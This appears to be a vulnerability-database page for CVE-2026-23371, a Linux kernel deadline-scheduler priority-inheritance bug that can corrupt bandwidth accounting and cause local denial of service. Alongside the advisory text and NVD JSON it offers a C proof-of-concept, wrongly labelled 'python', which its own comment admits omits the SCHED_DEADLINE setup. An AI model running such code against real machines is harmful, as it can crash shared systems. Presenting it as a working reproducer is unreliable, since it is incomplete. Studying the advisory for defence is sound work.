CVE-2026-23371

Description

In the Linux kernel, the following vulnerability has been resolved: sched/deadline: Fix missing ENQUEUE_REPLENISH during PI de-boosting Running stress-ng --schedpolicy 0 on an RT kernel on a big machine might lead to the following WARNINGs (edited). sched: DL de-boosted task PID 22725: REPLENISH flag missing WARNING: CPU: 93 PID: 0 at kernel/sched/deadline.c:239 dequeue_task_dl+0x15c/0x1f8 ... (running_bw underflow) Call trace: dequeue_task_dl+0x15c/0x1f8 (P) dequeue_task+0x80/0x168 deactivate_task+0x24/0x50 push_dl_task+0x264/0x2e0 dl_task_timer+0x1b0/0x228 __hrtimer_run_queues+0x188/0x378 hrtimer_interrupt+0xfc/0x260 ... The problem is that when a SCHED_DEADLINE task (lock holder) is changed to a lower priority class via sched_setscheduler(), it may fail to properly inherit the parameters of potential DEADLINE donors if it didn't already inherit them in the past (shorter deadline than donor's at that time). This might lead to bandwidth accounting corruption, as enqueue_task_dl() won't recognize the lock holder as boosted. The scenario occurs when: 1. A DEADLINE task (donor) blocks on a PI mutex held by another DEADLINE task (holder), but the holder doesn't inherit parameters (e.g., it already has a shorter deadline) 2. sched_setscheduler() changes the holder from DEADLINE to a lower class while still holding the mutex 3. The holder should now inherit DEADLINE parameters from the donor and be enqueued with ENQUEUE_REPLENISH, but this doesn't happen Fix the issue by introducing __setscheduler_dl_pi(), which detects when a DEADLINE (proper or boosted) task gets setscheduled to a lower priority class. In case, the function makes the task inherit DEADLINE parameters of the donoer (pi_se) and sets ENQUEUE_REPLENISH flag to ensure proper bandwidth accounting during the next enqueue operation.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:5.10:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 版本特定commit (ba1c22924ddc...)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-23371: Trigger missing ENQUEUE_REPLENISH
 * This code simulates the scenario described in the vulnerability report.
 * Requires a kernel with SCHED_DEADLINE support and appropriate permissions.
 */

#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

pthread_mutex_t pi_mutex;

void *holder_thread(void *arg) {
    // 1. Hold the mutex
    pthread_mutex_lock(&pi_mutex);
    printf("Holder: Lock acquired\n");

    // Simulate workload or wait for de-boost
    sleep(1);

    // 2. Change scheduler to lower priority (e.g., SCHED_OTHER) while holding lock
    struct sched_param param;
    param.sched_priority = 0;
    if (sched_setscheduler(0, SCHED_OTHER, &param) == 0) {
        printf("Holder: Scheduler changed to SCHED_OTHER\n");
    }

    sleep(1);
    pthread_mutex_unlock(&pi_mutex);
    printf("Holder: Lock released\n");
    return NULL;
}

void *donor_thread(void *arg) {
    // Wait a bit to ensure holder has the lock
    sleep(1);
    
    printf("Donor: Trying to acquire lock...\n");
    // 3. Block on the mutex held by the holder (Priority Inheritance trigger)
    pthread_mutex_lock(&pi_mutex);
    printf("Donor: Lock acquired\n");
    pthread_mutex_unlock(&pi_mutex);
    return NULL;
}

int main() {
    pthread_mutexattr_t attr;
    pthread_mutexattr_init(&attr);
    pthread_mutexattr_setprotocol(&attr, PTHREAD_PRIO_INHERIT);
    pthread_mutex_init(&pi_mutex, &attr);

    pthread_t h_tid, d_tid;
    
    // Set initial policy to SCHED_DEADLINE or RT (simplified here for structure)
    struct sched_param param;
    param.sched_priority = 10;
    // Note: Real reproduction requires setting SCHED_DEADLINE params correctly
    
    pthread_create(&h_tid, NULL, holder_thread, NULL);
    pthread_create(&d_tid, NULL, donor_thread, NULL);

    pthread_join(h_tid, NULL);
    pthread_join(d_tid, NULL);

    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23371
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23371
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23371/
[4] VulDB https://vuldb.com/cve/CVE-2026-23371
[5] https://git.kernel.org/stable/c/ba1c22924ddcc280672a2a06a9ca99ee3a1b92c3
[6] https://git.kernel.org/stable/c/d658686a1331db3bb108ca079d76deb3208ed949

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23371", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:36.637", "lastModified": "2026-04-24T16:36:24.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/deadline: Fix missing ENQUEUE_REPLENISH during PI de-boosting\n\nRunning stress-ng --schedpolicy 0 on an RT kernel on a big machine\nmight lead to the following WARNINGs (edited).\n\n sched: DL de-boosted task PID 22725: REPLENISH flag missing\n\n WARNING: CPU: 93 PID: 0 at kernel/sched/deadline.c:239 dequeue_task_dl+0x15c/0x1f8\n ... (running_bw underflow)\n Call trace:\n dequeue_task_dl+0x15c/0x1f8 (P)\n dequeue_task+0x80/0x168\n deactivate_task+0x24/0x50\n push_dl_task+0x264/0x2e0\n dl_task_timer+0x1b0/0x228\n __hrtimer_run_queues+0x188/0x378\n hrtimer_interrupt+0xfc/0x260\n ...\n\nThe problem is that when a SCHED_DEADLINE task (lock holder) is\nchanged to a lower priority class via sched_setscheduler(), it may\nfail to properly inherit the parameters of potential DEADLINE donors\nif it didn't already inherit them in the past (shorter deadline than\ndonor's at that time). This might lead to bandwidth accounting\ncorruption, as enqueue_task_dl() won't recognize the lock holder as\nboosted.\n\nThe scenario occurs when:\n1. A DEADLINE task (donor) blocks on a PI mutex held by another\n DEADLINE task (holder), but the holder doesn't inherit parameters\n (e.g., it already has a shorter deadline)\n2. sched_setscheduler() changes the holder from DEADLINE to a lower\n class while still holding the mutex\n3. The holder should now inherit DEADLINE parameters from the donor\n and be enqueued with ENQUEUE_REPLENISH, but this doesn't happen\n\nFix the issue by introducing __setscheduler_dl_pi(), which detects when\na DEADLINE (proper or boosted) task gets setscheduled to a lower\npriority class. In case, the function makes the task inherit DEADLINE\nparameters of the donoer (pi_se) and sets ENQUEUE_REPLENISH flag to\nensure proper bandwidth accounting during the next enqueue operation."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nsched/deadline: Solucionar la falta de ENQUEUE_REPLENISH durante la des-potenciación PI\n\nEjecutar stress-ng --schedpolicy 0 en un kernel RT en una máquina grande podría llevar a las siguientes ADVERTENCIAS (editado).\n\n sched: Tarea DL des-potenciada PID 22725: Falta la bandera REPLENISH\n\n ADVERTENCIA: CPU: 93 PID: 0 en kernel/sched/deadline.c:239 dequeue_task_dl+0x15c/0x1f8\n ... (desbordamiento negativo de running_bw)\n Traza de llamada:\n dequeue_task_dl+0x15c/0x1f8 (P)\n dequeue_task+0x80/0x168\n deactivate_task+0x24/0x50\n push_dl_task+0x264/0x2e0\n dl_task_timer+0x1b0/0x228\n __hrtimer_run_queues+0x188/0x378\n hrtimer_interrupt+0xfc/0x260\n ...\n\nEl problema es que cuando una tarea SCHED_DEADLINE (poseedor del bloqueo) se cambia a una clase de prioridad inferior a través de sched_setscheduler(), puede no heredar correctamente los parámetros de los posibles donantes DEADLINE si no los heredó ya en el pasado (plazo más corto que el del donante en ese momento). Esto podría llevar a la corrupción de la contabilidad del ancho de banda, ya que enqueue_task_dl() no reconocerá al poseedor del bloqueo como potenciado.\n\nEl escenario ocurre cuando:\n1. Una tarea DEADLINE (donante) se bloquea en un mutex PI mantenido por otra tarea DEADLINE (poseedor), pero el poseedor no hereda los parámetros (por ejemplo, ya tiene un plazo más corto)\n2. sched_setscheduler() cambia el poseedor de DEADLINE a una clase inferior mientras aún mantiene el mutex\n3. El poseedor debería ahora heredar los parámetros DEADLINE del donante y ser encolado con ENQUEUE_REPLENISH, pero esto no sucede\n\nSolucionar el problema introduciendo __setscheduler_dl_pi(), que detecta cuando una tarea DEADLINE (propia o potenciada) se programa a una clase de prioridad inferior. En ese caso, la función hace que la tarea herede los parámetros DEADLINE del donante (pi_se) y establece la bandera ENQUEUE_REPLENISH para asegurar una contabilidad adecuada del ancho de banda durante la siguiente operación de encolado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": ... (truncated)